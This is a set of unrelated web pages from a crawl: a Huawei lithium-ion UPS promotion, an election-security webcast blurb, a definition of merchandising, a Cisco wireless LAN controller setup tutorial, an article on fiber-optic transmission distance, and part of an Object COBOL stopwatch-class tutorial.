The uninterruptible power supply (UPS) is the cornerstone of the modern data center, and is one of the primary culprits of inefficient usage of hardware. Traditional lead-based batteries are becoming increasingly redundant – and data centers have begun to look for a solution that offers a compact, efficient, reliable power supply with a long lifespan.
Huawei's SmartLi UPS solution answers the call by leveraging the company's cutting-edge Li-ion battery technology and delivering a ‘reinvention' of the power supply system for the next generation of data centers.
It does this with Huawei's UPS power module, which boasts a high density of 100 kW/3U – pushing system efficiency up to 97%, compared with 96% efficiency in the industry.
Using only one 1.2MW UPS system, a data center's electricity fee can be reduced by US$70,000 in the products 10-year lifecycle, according to Huawei. It also offers a ‘1 MW, 1 rack' configuration, which effectively reduces the power supply's physical footprint by 50%.
Its high power density, Li-ion batteries also achieve a 70% smaller physical footprint than its Valve-Regulated Lead Acid (VRLA) counterparts.
By leveraging ultimate UPS efficiency, data centers can lower costs and save thousands, free up valuable floor real estate within their facility, and opt for a greener solution for future data centers.
Functionally, the SmartLi UPS system's modular design ensures no single point of failure – with an LFP cell impervious to fires or explosions, as well as cabinet-level extinguishing to prevent any combustion from spreading.
SmartLi UPS also leverages an active current balance control interface, allowing the system to function normally even if a battery module fails. This balance control technology also allows for the concurrent use of old and new batteries.
Reliability is further enshrined within the product with its 10-year, 5,000 cycle lifetime.Real-life application
When Intelligent Power Solutions CEO Peter Perjesi first met with Huawei to discern whether the company would implement its UPS solutions, he was doubtful.
“To tell the truth I was sceptical I was sceptical about features,” says Perjesi.
“But when I saw the product, I saw the basic parts of the UPS were high-quality elements like long-life capacitors, IGBT, fans and so on.
“We got the test products and all of the tests passed. I was surprised – our engineers really tried to kill the unit, but they couldn't," Perjesi says.
“Maximisation of space utilisation; less operation and maintenance cost; longer service life; more efficient energy utilisation – the answer for all of these requirements is the Huawei SmartLi solution.
To find out more about Huawei's SmartLi UPS system, click here.
|
<urn:uuid:f0a78f68-9278-4604-b6d0-c8dc22143b5e>
|
CC-MAIN-2022-40
|
https://datacenternews.asia/story/the-importance-of-the-lithium-ion-battery-for-future-data-centres
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00657.warc.gz
|
en
| 0.934838 | 729 | 2.65625 | 3 |
How to Create Public Confidence in Election Systems
The key to democracy is public confidence in election systems. Winners and losers of an election, as well as the voters, must be able to trust the outcome of the electoral process. Computer forensics is a powerful tool to identify election hacking, but there are obstacles. We'll look at the forensic analysis of the WinVote voting machine and alternatives to computer forensics to establish public confidence in election systems.
Election security is a complex topic with numerous areas to consider and analyze. Some areas of interest include:
- The Current State and Belief of Election Cybersecurity Integrity
- Political Views on Cybersecurity
- Likely Targets: Who, What and, Disinformation
|
<urn:uuid:2b30f4df-1085-4cd0-af0d-b2dc753e4a31>
|
CC-MAIN-2022-40
|
https://www.anomali.com/resources/webcasts/black-hat-with-anomali-how-to-create-public-confidence-in-election-systems
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00657.warc.gz
|
en
| 0.94678 | 156 | 3.359375 | 3 |
What is Merchandising?
Merchandising involves the tactics (or business processes) that contribute to the sale of goods and services to the customer for profit. Merchandising is the promotion of the sale of goods that can employ pricing, special offers, display and other techniques designed to influence consumers’ buying decisions. The concept of merchandising is based on presenting products at the right time, at the right place, in the right quantity and at the right price to maximize sales.
At a retail in-store level, merchandising refers to the variety of products available for sale and the display of those products in such a way that it stimulates interest and entices customers to make a purchase.
For example, the definition of product merchandising applies whether a retailer is merchandising shoes in-person or online, and even if they are merchandising a product that isn't physical, such as an eBook.
|
<urn:uuid:5139c576-2687-4bf9-a7b8-4dcb206226f5>
|
CC-MAIN-2022-40
|
https://www.hcltech.com/technology-qa/what-merchandising
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00657.warc.gz
|
en
| 0.933889 | 200 | 2.625 | 3 |
In this article we will go through a basic step-by-step configuration of a Cisco Wireless LAN Controller. Before going forward, let’s first see some basics about the product and the wlan technology from Cisco:
Cisco introduced two types of Wireless architectures in its WiFi portfolio:
- Distributed Architecture.
- Centralized Architecture.
- Distributed WiFi Architecture: In Distributed Architecture all the WiFi Access Points (APs) are self-contained and called autonomous or standalone APs. Autonomous APs work individually and have to be configured and managed one by one. In this Architecture an autonomous Access Point performs both 802.11 operations and management operations.
- Centralized WiFi Architecture: In Centralized Architecture the access points are controlled and managed by a central device called Wireless LAN Controller (WLC) and such APs are called Lightweight APs. A lightweight access point performs only the real-time 802.11 operation. All the management functions are usually performed on a wireless LAN controller. A Lightweight AP cannot operate on its own.
Before jumping into the configuration, let’s talk a little bit about Wireless LAN Controller Ports, Controller Interfaces and CAPWAP protocol.
|1)||Redundant port (RJ-45)||6)||SFP distribution system ports 1–8|
|2)||Service port (RJ-45)||7)||Management port LEDs|
|3)||Console port (RJ-45)||8)||SFP distribution port Link and Activity LEDs|
|4)||USB ports 0 and 1 (Type A)||9)||Power supply (PS1 and PS2), System (SYS), and Alarm (ALM) LEDs|
|5)||Console port (Mini USB Type B)
|10)||Expansion module slot|
WLC Controller Ports:
Controller Ports are the physical ports of the device as shown on picture above. The following are the most important Controller physical Ports.
- Service Port (SP): Used for initial boot function, system recovery and out of band management. If you want to configure the controller with GUI you need to connect your computer with service port.
- Redundancy Port (RP): This port is used to connect another controller for redundant operations.
- Distribution Ports: These ports are used for all Access Points and management traffic. A Distribution Port connects to a switch port in trunk mode. 4400 series controllers have four distribution ports and 5500 series controllers have eight distribution ports.
- Console port: Used for out-of-band management, system recovery and initial boot functions.
WLC Controller Interfaces:
WLC Controller Interfaces are logical entities on the device. The following are the most important Controller logical Interfaces:
- Management Interface: Used for all management traffic.
- Virtual Interface: Used to relay client DHCP requests, client web authentication and to support mobility.
- Service port interface: Bound to service port and used for out-of-band management. Default ip address is 192.168.1.1. If you want to configure the controller first time with GUI, connect your computer with this port. Computer should be in the same subnet as service interface.
- Dynamic Interface: Used to connect to VLAN to a WLAN.
CAPWAP (Control and Provisioning of Wireless Access Points) is a protocol which makes it possible to bind a Lightweight Access Point with a WLC. The CAPWAP protocol encapsulates the traffic between the Lightweight Access Point and WLC in a virtual tunnel called CAPWAP tunnel. All the traffic from access point to the WLC travels through this tunnel. Therefore you should have in mind that in a Centralized WiFi Architecture, all traffic from the Access Points terminate to the WLC controller and then diverted from the controller to the wired network as shown in figure below:
Basic Cisco WLC Configuration
Below is the initial configuration of 5508 Wireless LAN Controller. In Blue color are my comments on each step of the configuration. To access the CLI you need to connect your computer to the Console Port of the Wireless LAN Controller with a console cable.
Wireless LAN Controller initial configuration with the CLI:
Welcome to the Cisco Wizard Configuration Tool
Use the ‘-‘ character to backup
Would you like to terminate autoinstall? [yes]: no
“enter no to follow the auto-install instructions”
AUTO-INSTALL: starting now. . .
System Name [Cisco_38:b4:2f]: My_WLC
Enter Administrative User Name (24 characters max): Admin
Enter Administrative Password (3 to 24 characters): *******
Re-enter Administrative Password : *******
“enter your wireless lan controller name. Enter username and password that you are going to use to log into the WLC”
Service Interface IP address Configuration [static] [DHCP]: DHCP
“Assign a static ip or select DHCP”
Management Interface IP Address: 192.168.10.10
Management Interface Netmask: 255.255.255.0
Management Interface Default Router: 192.168.10.1
Management Interface VLAN Identifier (0 = untagged): 10
Management Interface DHCP Server IP Address: 192.168.1.3
“By default, the interface is configured for VLAN 0, with no ip address and controller uses a single management interface for both management and CAPWAP traffic.”
Virtual Gateway IP Address: 184.108.40.206
“Used to relay client DHCP requests, client web authentication and to support mobility. This value Must match among mobility groups.”
Mobility/RF Group Name: XYZ
“Mobility / RF Group allows multiple wireless controllers to be clustered into one logical Controller group to allow dynamic RF adjustments and roaming for wireless clients.”
Network Name (SSID): TEST
Allow Static IP Addresses [YES][no]: no
“By default on WLC one WLAN SSID is already configured.”
Configure a RADIUS Server now? [YES][no]: no
Warning! The default WLAN security policy requires a RADIUS server.
Please see documentation for more details.
“Configure RADIUS server settings if you have a RADIUS server. By default RADIUS server is enabled.”
Enter Country Code (enter ‘help’ for a list of countries) [US]: US
Enable 802.11b Network [YES][no]: yes
Enable 802.11a Network [YES][no]: yes
Enable 802.11g Network [YES][no]: yes
Enable Auto-RF [YES][no]: yes
“By default, a controller enables 802.11a, 802.11b and 802.11g for all access points that associate with it”
Configure a NTP server now? [YES] [NO]:no
Warning! No AP will come up unless the time is set.
Please see documentation for more details.
“You have set a time or NTP server. If you don’t have NTP server, just enter no and login into GUI and set time on the controller from there”
Configuration correct? If yes, system will save it and reset. [yes][NO]:yes
Resetting system with new configuration…
“After initial setup, WLC saves the changes and reboot”
|
<urn:uuid:6fb7ed5a-e0a0-4b56-8421-6ff4e74fb7ea>
|
CC-MAIN-2022-40
|
https://www.networkstraining.com/cisco-wireless-lan-controller-configuration/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00657.warc.gz
|
en
| 0.82861 | 1,574 | 2.546875 | 3 |
In the optical network, except the speed, data transmission distance is another important thing that we care. What can limit the transmission distance? At first we may think of fiber optic cable. Compared with copper cable, it can support longer transmission distance, high speed, high bandwidth, etc. However, not everything is perfect. Fiber optic cable still has some imperfections that influence the transmission distance. Besides, other transmitting media like transceivers, splices and connectors can also limit the transmission distance. The following will tell more details.
Fiber optic cable can be divided into single-mode cable and multimode cable. The transmission distance supported by single-mode cable is longer than multimode cable. That’s because of the dispersion. Usually the transmission distance is influenced by dispersion. Dispersion includes chromatic dispersion and modal dispersion (as shown in the following figures). Chromatic dispersion is the the spreading of the signal over time resulting from the different speeds of light rays. Modal dispersion is the spreading of the signal over time resulting from the different propagation mode.
For single-mode fiber cable, it is chromatic dispersion that affects the transmission distance. This is because, the core of the single-mode fiber optic is much smaller than that of multimode fiber. So the transmission distance is longer than multimode fiber cable. For multimode fiber cable, modal dispersion is the main cause. Because of the fiber imperfections, these optical signals cannot arrive simultaneously and there is a delay between the fastest and the slowest modes, which causes the dispersion and limits the performance of multimode fiber cable.
Like most of the terminals, fiber optic transceiver modules are electronic based. Transceiver modules play the role of EOE conversions (electrics-optics-electrics). The conversion of signals is largely depend on an LED (light emitting diode) or a laser diode inside the transceiver, which is the light source of fiber optic transceiver. The light source can also affect the transmission distance of a fiber optic link.
LED diode based transceivers can only support short distances and low data rate transmission. Thus, they cannot satisfy the increasing demand for higher data rate and longer transmission distance. For longer transmission distance and higher data rate, laser diode is used in most of the modern transceivers. The most commonly used laser sources in transceivers are Fabry Perot (FP) laser, Distributed Feedback (DFB) laser and Vertical-Cavity Surface-Emitting (VCSEL) laser. The following chart shows the main characteristics of these light sources.
|Light Source||Transmission Distance||Transmission Speed||Transmission Frequency||Cost|
|Low Speed||Wide Spectral width||Low Cost|
|FP||Medium Range||High Speed||Medium Spectral Width||Moderate Cost|
|DFB||Long Range||Very High Speed||Narrow Spectral Width||High Cost|
|VCSEL||Medium Range||High Speed||Narrow Spectral Width||Low Cost|
As the above chart mentioned, different laser sources support different frequencies. The maximum distance a fiber optic transmission system can support is affected by the frequency at which the fiber optic signal will be transmitted. Generally the higher the frequency, the longer distance the optical system can support. Thus, choosing the right frequency to transmit optical signals is necessary. Generally, multimode fiber system uses frequencies of 850 nm and 1300 nm, and 1300nm and 1550 nm are standard for single-mode system.
Bandwidth is another important factor that influences the transmission distance. Usually, as the bandwidth increases, the transmission distance decreases proportionally. For instance, a fiber that can support 500 MHz bandwidth at a distance of one kilometer will only be able to support 250 MHz at 2 kilometers and 100 MHz at 5 kilometers. Due to the way in which light passes through them, single-mode fiber has an inherently higher bandwidth than multimode fiber.
Splice and connector are also the transmission distance decreasing reasons. Signal loss appears when optical signal passes through each splice or connector. The amount of the loss depends on the types, quality and number of connectors and splices.
All in all, the above content introduces so many factors limiting the transmission distance, like fiber optic cable type, transceiver module’s light source, transmission frequency, bandwidth, splice and connector. As to these factors, different methods and choices can be taken to increase the transmission distance. Meanwhile, equipment like repeater and optical amplifiers are also useful to support the long distance transmission. So there must be some ways to help you increase the transmission distance.
|
<urn:uuid:299d4940-838e-41cb-ba0e-10f2fa6483e3>
|
CC-MAIN-2022-40
|
https://www.fiber-optic-cable-sale.com/tag/fiber-optic-transceiver
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00657.warc.gz
|
en
| 0.891702 | 963 | 3.515625 | 4 |
Sound unlikely? I don’t think it’s as crazy as it seems, especially when we think of everything that has changed in the last ten years, like social media, artificial intelligence, and automation.
The work human beings do will continue to shift as some jobs become obsolete and new jobs emerge – and the experience and skill set we'll need in the future look very different from the ones we need today.
Soft skills will grow in importance as the demand for the things machines can’t do continues to increase. However, the ability to understand and work confidently with technology will still be critical.
With that in mind, here are four digital skills you need to cultivate to thrive in the new world of work:
Digital literally refers to the skills needed to learn, work, and navigate our everyday lives in our increasingly digital world. When we have digital literacy skills, we are able to interact easily and confidently with technology. This means skills like:
- Keeping on top of emerging new technologies
- Understanding what tech is available and how it can be used
- Using digital devices, software, and applications – at work, in educational settings, and in our everyday lives
- Communicating, collaborating, and sharing information with other people using digital tools
- Staying safe and secure in a digital environment
We're currently right in the middle of the fourth industrial revolution, a movement that is defined by many waves of new technology that combine digital and physical worlds. For instance, you've probably noticed the flood of "smart" everyday devices on the market today, from watches to thermostats that are connected to the internet.
All of that new technology is underpinned by data – and that’s why data literacy is one of the critical skills we’re going to need in the future.
Data literacy means a basic ability to understand the importance of data and how to turn it into insights and value. In a business context, you’ll need to be able to access appropriate data, work with data, find meaning in the numbers, communicate insights to others, and question the data when necessary.
“Technical skills” is a broad category these days – it’s not just IT and engineering skills that will be needed in the workplace of the future. As the nature of work changes and workflows become more automated, a wide variety of technical skills are still enormously valuable.
In essence, technical skills are the practical or physical skills needed to do a job successfully. Demand for these skills goes far beyond coding, AI, data science, and IT – although admittedly, those skills are indeed in very high demand. If you’re a plumber, you have technical skills. Same for project managers, carpenters, nurses, and truck drivers.
We will need more specific technical skills in every industry as new technologies come on the scene, so you should be prepared to continually learn and focus on professional development through a combination of training, education, and on-the-job training.
Digital Threat Awareness
Cybercriminals are getting smarter and more nefarious as the world becomes more digital. This means new threats that could have enormous impacts on our personal and professional lives.
Digital threat awareness means being aware of the dangers of being online or using digital devices and having the tools you need to keep yourself and your organization safe.
With so many of our activities happening online (from making doctor’s appointments to ordering Friday night takeaway) happening online, our digital footprints are larger than ever.
Digital threat awareness means understanding the biggest threats in our everyday lives, including:
- Digital addiction
- Online privacy and protecting your data
- Password protection
- Digital impersonation
- Data breaches
- Malware, ransomware, and IoT attacks
In general, lowering the risks of these digital threats means we all need to develop a healthier relationship with technology and teach others how to get the most out of tech and have it enrich our lives without being dominated by it.
|
<urn:uuid:d9a9461b-6faf-424a-9a0a-392bdc636ecf>
|
CC-MAIN-2022-40
|
https://bernardmarr.com/the-4-digital-skills-everyone-will-need-for-the-future-of-work/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00657.warc.gz
|
en
| 0.942591 | 836 | 2.953125 | 3 |
Over the last couple of decades, many entrepreneurs and small business owners as well as global business giants have seen the value of selling their goods and services online through e-commerce as opposed to opening a physical brick and mortar store.
While e-commerce, whether it is social media selling ventures, websites, or online marketplaces, is incredibly profitable when done right (especially in relation to overhead costs in traditional setups) it is still a ripe feeding ground for malicious hackers and breaches of cybersecurity.
In this age of digitalization, it is becoming increasingly crucial for businesses to have a reliable and secure online presence. However, this comes with a downside of higher risks to cyberattacks. Now and then, businesses fall victim to cyber-attacks that could have been prevented with the proper cybersecurity measures. This is where engaging managed cybersecurity services can be beneficial to your business.
Companies doing business with the Department of Defense (DoD) often become targets of different cyberattacks. Defense contractors become targets because the DoD sources them to carry out various tasks, including storing and sharing sensitive information. Therefore, without proper security safeguards, it can threaten the lives of service members and National Security.
That’s why cybersecurity and privacy regulations have been changed or updated over the past decade. Hackers are finding new and sophisticated ways to launch cyberattacks on information systems of contractors and subcontracts. As a result, the DoD has implemented laws and regulations to protect its data.
Several cybersecurity standards may come from federal, state, local, or tribal agencies. Therefore, this article will serve as a brief guide to some DoD cybersecurity regulations.
Microsoft has just released version 1903 for the Windows operating system. The update includes several new features: the ransomware protection feature for Windows Defender, which is the built-in virus protection software for Windows 10.
However, users no longer need to worry about data protection with the latest protection features. To enable this feature, PC users must have Windows 10 version 1903 and a fast internet connection.
Technological advancements stimulate creativity, adaptability and market expansion, and there is no disputing the global digital revolution we are currently experiencing. Let’s take a look at six recent technical developments and inventions you should be aware of.
1. Advanced Artificial Intelligence
Over the last decade, artificial intelligence (AI) has garnered considerable attention. It remains one of the most crucial emergent technology innovations and profoundly affects how humanity lives, works and plays. AI is truly a technology that’s still in its infancy.
AI is now widely recognized for its use in picture and voice recognition, ride-sharing apps, personal assistants on mobile devices, navigation apps and various other applications.
Machine learning, a trendy subcategory of artificial intelligence, is being applied in many sectors, increasing the demand for skilled personnel.
Keeping your business safe from cybersecurity threats should be a priority. As the cases increase in recent years, you don’t want your business to experience data loss. With this in mind, it’s crucial to take the necessary steps to know the IT vulnerabilities that can put your network at risk and find ways to boost your security.
A vulnerability is generally a weakness or flaw in the system or network. In most cases, cybercriminals might find ways to exploit these to damage or infiltrate the system. Always remember that vulnerabilities are present in the system or network. Additionally, they’re not the result of an intentional effort, but cybercriminals might make the most out of these flaws during their attacks.
In the age of the internet, more organizations are slowly transferring their data to the cloud. It was not long ago when an employee had to carry a flash drive around in case they’d have to present a report. Although some employees still use a flash drive, it was more a backup solution than a necessity.
Smart offices have become clutter-free since management can approve requests and reports with a push of a button. However, seamless collaboration between colleagues can be a challenge due to slow adoption and a lack of technical know-how.
Communication can also be a factor in making collaboration challenging to organizations. Messages are ‘left on read’ because some employees don’t know how to reply. They may also be overwhelmed by the number of messages they receive every day. You won’t know if they’ve acknowledged it unless they respond or react to the message you sent.
The very first radio frequency identification (RFID) device was created in 1946 by the Russian physicist Leon Theremin. So RFID systems aren’t a new technology by any means.
However, if you’re well informed of the news, you probably already know that RFID systems have been the rage for quite some time now in many industries. This prominence might be because the necessary equipment to set up an RFID system is more affordable these days than ever before.
Hence, pretty much everyone can develop their own systems, given that they have the necessary expertise. In fact, you can build a fairly decent system with a budget of only USD$1,000. But while it’s indeed more affordable, the fact that security is still necessary for RFID systems remains. On that note, here are five tips to help you secure your RFID system:
Today, news of cyberattacks is common. The majority of cyberattacks capitalize on vulnerabilities of application security. According to Forbes, cybercrime is rising because most people think of it as someone else’s problem. To address cyber security concerns, businesses and developers have come up with ways of testing application security.
With the growing number of tools aimed at testing application security, developers can find it challenging to choose the right tool. Testing for cyber security begins by evaluating an application through the eyes of a cybercriminal. This guide provides various application testing tips that are necessary when testing for cyber security.
In the modern, highly digital world of today’s business, cyber security is an important aspect. Because of how interconnected our society has become, a breach in one area can have a domino effect on multiple other systems and functions across an organization. Having the right protections in place to ensure that your small business does not fall victim to a cyber-attack is essential. One step to take toward this goal is through a small business proposal template cybersecurity proposal.
One of the first things that you must do is gain a thorough understanding of your needs as a business owner. Not only must you understand how a cyber breach would affect your business, but also the cost that it will take to properly protect your organization. Knowing about things like security budgets and what other aspects need attention can be very important in writing an effective proposal.
|
<urn:uuid:850c151c-271e-4c30-937c-372994977a62>
|
CC-MAIN-2022-40
|
https://www.cyberdb.co/category/cyber-industry/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00657.warc.gz
|
en
| 0.94613 | 1,397 | 2.5625 | 3 |
We would like to keep you up to date with the latest news from Digitalisation World by sending you push notifications.
In light of this, space technology and spacecrafts are increasingly complex and are using more software than ever before. For example, an advanced fighter aircraft relied on less than three million lines of code ten years ago. Today, the F-35 runs eight million lines of code. Space organisations have innovative ways of testing hardware and equipment ahead of launch, from pouring 450,000 gallons of water on rocket launchpad to capsule raft equipment for landing. However, it isn’t just the physical equipment that needs to be tested.
When it comes to testing technology that will be used in space travel, manually testing each piece of equipment will add a considerable amount of time to the preparation process.So, how is software tested quickly and efficiently?
To ensure that all aspects of the mission are vigorously tested, space organisations around the world are turning to automated testing. For example, for future space explorations—such as Orion—rigorous testing is taking place to ensure that onboard software and equipment works as expected and doesn’t suffer from any faults—even if subjected to strained use.
Space is a high-stakes environment, with large amounts of money—and possibly human lives—at risk if something goes wrong. Automated, vigorous testing ensures that the software and technology delivers the required outcomes both on land and in space.
AI-assisted and automated testing can provide predictive analytics for launch readiness, and can test many scenarios. This helps teams to predict quality issues that might occur, intelligently navigate applications, and identify and resolve issues quickly.
Testing software is important, but if it isn’t tested through the eyes of the astronauts who will be using the technology, it won’t be as effective. Using automated testing to test through the eyes of the user—alongside the full user experience, functionality, performance and usability—means that tests can ‘see’ and ‘do’ what the user can, and will test the user experience, not just the code.
For example, if something goes wrong while in space, the astronauts onboard will enter a stressful state, and might start using software more vigorously. Users might begin switching between screens rapidly, or rebooting programmes or software quickly. Because of this, the technology needs to be tested beforehand in ‘real-life scenarios’, to ensure that it is failure-proof in a variety of states, and can cope with how a real user would use the technology.
With automated testing, space organisations can test hundreds of scenarios quickly, and no longer need to spend time manually testing the software and technology. Automated testing can increase and scale alongside technology, learning and adapting to new processes and systems as the software becomes more intricate. AI and automation have the potential to hugely speed up technology advancements and safety in the business of outer space exploration so it’s an exciting time for industry. It’s also the ultimate test arena for testers.
|
<urn:uuid:afc54fdd-def5-4006-b04b-d1b54d3e9a78>
|
CC-MAIN-2022-40
|
https://digitalisationworld.com/blogs/55608/houston-we-have-a-problem-mission-critical-testing-in-space-exploration?utm_content=83573337&utm_medium=social&utm_source=twitter&hss_channel=tw-44719195
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00057.warc.gz
|
en
| 0.926483 | 629 | 3.390625 | 3 |
If layered security is the cake, Open XDR is the frosting
The anchor of Enterprise Security is popularly known as a “Defense in Depth” architecture. The Defense in Depth (DID) is a classic defensive concept used in the military that found acceptance in the Infosec community in the early 2000s. The Infosec implementation/version of DID has evolved to address the threats as the threat landscape progressed over time.
Before the advent of the internet, computers had only AV protection because the main threat was viruses. Viruses were transferred over media (floppy disk, etc.). With the internet, all computers were connected, and threats like worms spread over networks, so we had to secure the networks, and we needed to police who came into the networks in the first place, and on and on.
In its current form, the DID architecture has grown to accommodate many layers and still evolving. So, the DID architecture translated into layered security – Perimeter, Network, Endpoint, Application, User, Data, Policies, etc. For each layer, a separate and distinct control was developed to protect against threats to that layer. For example, the technical security controls included solutions such as Firewalls, Secure Web Gateways, IDS/IPS, EDR, DLP, WAF, and anti-malware products.
In addition to deploying the layered security solution to the evolving threat landscape over time, the solutions were owned, managed, and operated by different groups inside the company. For example, the Firewall solution was owned by the infrastructure team under IT. Another group owned the email solution, and another group owned the endpoint security solution. This created a layered solution that existed independently of all other solutions. Hence, the concept of a standalone solution with all the learnings stayed inside the team responsible for it – in a silo.
Another unique attribute, best-of-breed solutions, also characterized the layered solution. Because the solutions evolved, the innovation came from different sources and disciplines, and a different set of vendors provided each new solution layer.
The DID or layered approach to security worked well for single vector threats, i.e., when the threat entered and exited in the same vector. A classic example of these early threats is the networks-based attacks detected by IDS/IPS, email threats like Spam by email gateways, etc.
However, as the threats become more complex and the advent of automated malware generation tools, Botnet, and remote programming, the layered security model is falling apart. This is because the assumption inherent to layered security – that all the protections and controls are aligned perfectly to detect all the threats and there are no blind spots – is being proven false. There are blind spots that none of the controls have any visibility into. As a result, the attackers are using the blind spots to their advantage, making it difficult to detect these malicious activities.
From our experience in dealing with a multi-vector threat, it’s clear that all the controls involved in a multi-vector threat have visibility only to their silos and nothing beyond that. Remember that this is by design and the way the current solution came together.
Also, all the underlying setup of separate infrastructures, data silos, and response mechanism means that managing the control directly, it’s a second order (n**2 – n) problem. However, having a layer on top of everything to work is a first order (2n) problem to be solved.
The options to address the blind spots are as follows:
- Have each control cover for their neighbor that they have no interest in doing.
- Hire more analysts to extend visibility beyond the silos manually
- Get a tool that can provide visibility into the controls and their data across the silos and detect these multi-vector threats using automated data collection, correlation, detection, and response.
If you chose option #3, you are correct!
No matter the name, the solution in #3 is an envelope that goes over all the controls to detect, correlate, co-ordinates, and provide response actions for threats across the silos.
And that is the most efficient way to optimize multi-control, layered security systems.
Its name is Open XDR.
Open XDR is the connective tissue between security controls designed to enable security teams to make sense of the vast amounts of data generated by their security controls. The reason it is called “Open” is non-trivial; it is a defining characteristic of the solution. Open XDRs can ingest data from any security control, including any EDR an organization has deployed. Then, using purpose-built detection capabilities can root out those multi-vector threats that can land your organization on the front page of the paper (or news website) if they went undetected.
While there is no silver bullet in cyber defense, Open XDR is a promising new approach to security that minimizes blind spots while making a security team more effective.
|
<urn:uuid:a298d70b-8f07-4d99-8853-d530bebe5285>
|
CC-MAIN-2022-40
|
https://stellarcyber.ai/if-layered-security-is-the-cake-open-xdr-is-the-frosting/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00057.warc.gz
|
en
| 0.952578 | 1,029 | 2.546875 | 3 |
Twitter has something of a bot problem. Anyone who uses the platform on even an occasional basis likely could point out automated accounts without much trouble. But detecting bots at scale is a much more complex problem, one that a pair of security researchers decided to tackle by building their own classifier and analyzing the characteristics and behavior of 88 million Twitter accounts.
Using a machine learning model with a set of 20 distinct characteristics such as the number of tweets relative to the age of the account and the speed of replies and retweets, the classifier is able to detect bots with about 98 percent accuracy. The tool outputs a probability that a given account is a bot, with anything above 50 percent likely being a bot. During their research, conducted from May through July, Jordan Wright and Olabode Anise of Duo Security discovered an organized network of more than 15,000 bots that was being used to promote a cryptocurrency scam. The botnet, which is still partially active, spoofs many legitimate accounts and even took over some verified accounts as part of a scheme designed to trick victims into sending small amounts of the cryptocurrency Ethereum to a specific address.
Unlike most botnets, the Ethereum network has a hierarchical structure, with a division of labor among the bots. Usually, each bot in a network performs the same task, whether that’s launching a DDoS attack or mining Bitcoin on a compromised machine. But the Ethereum botnet had clusters of bots with a three-tier organization. Some of the bots published the scam tweets, while others amplified those tweets or served as hub accounts for others to follow. Wright and Anise mapped the social media connections between the various accounts and looked at which accounts followed which others to create a better picture of the network.
“Each bot had its own role and the botnet evolved over time. They started by targeting legitimate cryptocurrency accounts, like the official Bitcoin account, and then moved on from there,” said Wright, an R&D engineer at Duo Labs.
“They changed to targeting celebrities and then posing as legitimate news accounts. We found different clusters that showed how the owner moved them over time.”
"There were times when some accounts were behaving like bots and others when they looked legitimate.”
Anise and Wright will discuss the results of their research during a talk at the Black Hat USA conference on Wednesday and will release their detection tool as an open source project that day, too.
The operator of the botnet changed the appearance of tweets over time, adding or removing whitespace and sometimes using Unicode characters rather than letters, in an effort to make the tweets look different and fool human users. One of the challenges Wright and Anise faced with their research was distinguishing legitimate accounts that may employ some automation from bot accounts. Many legitimate Twitter accounts use automation as a way to interact with other users quickly.
“Automation by itself isn’t bad. Legitimate accounts use it too, a lot of times as a customer service tool to respond to questions,” Anise, a data scientist, said. “We looked at two hundred tweets from each account we studied and there were times when some accounts were behaving like bots and others when they looked legitimate.”
Twitter has more than 336 million active users, and the company has had to deal with the bot problem for many years now and has created tools and strategies to identify and remove bots. Recently, Twitter officials said they had removed more than 70 million such accounts in a two-month period earlier this year. Wright and Anise notified Twitter about the cryptocurrency scam botnet they discovered, and the company has taken steps to address it.
“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections,” a Twitter spokesperson said.
Anise and Wright plan to continue the research in the future by finding a way to identify malicious bots.
|
<urn:uuid:0633349a-7449-4fa5-b7a6-17acc5839fa2>
|
CC-MAIN-2022-40
|
https://duo.com/decipher/new-tool-enables-detection-of-twitter-bots-at-scale
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00057.warc.gz
|
en
| 0.963044 | 839 | 2.78125 | 3 |
|Object COBOL Tutorials (UNIX)||Writing a Class Program Tutorial (UNIX)|
This tutorial is a gentle introduction to Object COBOL programming, using a class with some simple behavior, called the Stopwatch class. In this tutorial you will create instances of the Stopwatch class. An instance of the Stopwatch class is a stopwatch object, and having created stopwatches, you can send messages to them.
This tutorial consists of the following sessions:
Time to complete: 20 minutes.
This section introduces you to the Stopwatch class, describing its behavior and public object interface. The object interface is the list of methods implemented by an object, together with descriptions of the parameters passed to and from the object by each method.
The public object interface is a censored list of this information; it does not describe the object's private methods. A private method is one used by the object itself; it should not be invoked from outside the object.
The interface for the Stopwatch is split in two:
A class is an object in its own right; it can have behavior and data of its own, which is different to the behavior and data of instances of the class. The main function of most classes is to implement the behavior needed to create and initialize new instances.
You can use stopwatches to time things. Each stopwatch has methods to start, stop and reset timing, and to get the current elapsed time.
The Stopwatch class public object interface is listed below.
||Returns an instance of the Stopwatch class, with the handle
||Returns the number of Stopwatch instances created so far.|
||Start a stopwatch running.|
||Stop a stopwatch running.|
||Reset the elapsed time on the stopwatch to zero. You can only reset a stopwatch which isn't running.|
||Return the time since the stopwatch started in hh:mm:ss:ss
format (hours/minutes/seconds/hundredths of seconds).|
In addition to these methods, the Stopwatch class inherits all those implemented by its superclass (Base). The superclass is the parent from which this class inherits its basic behavior.
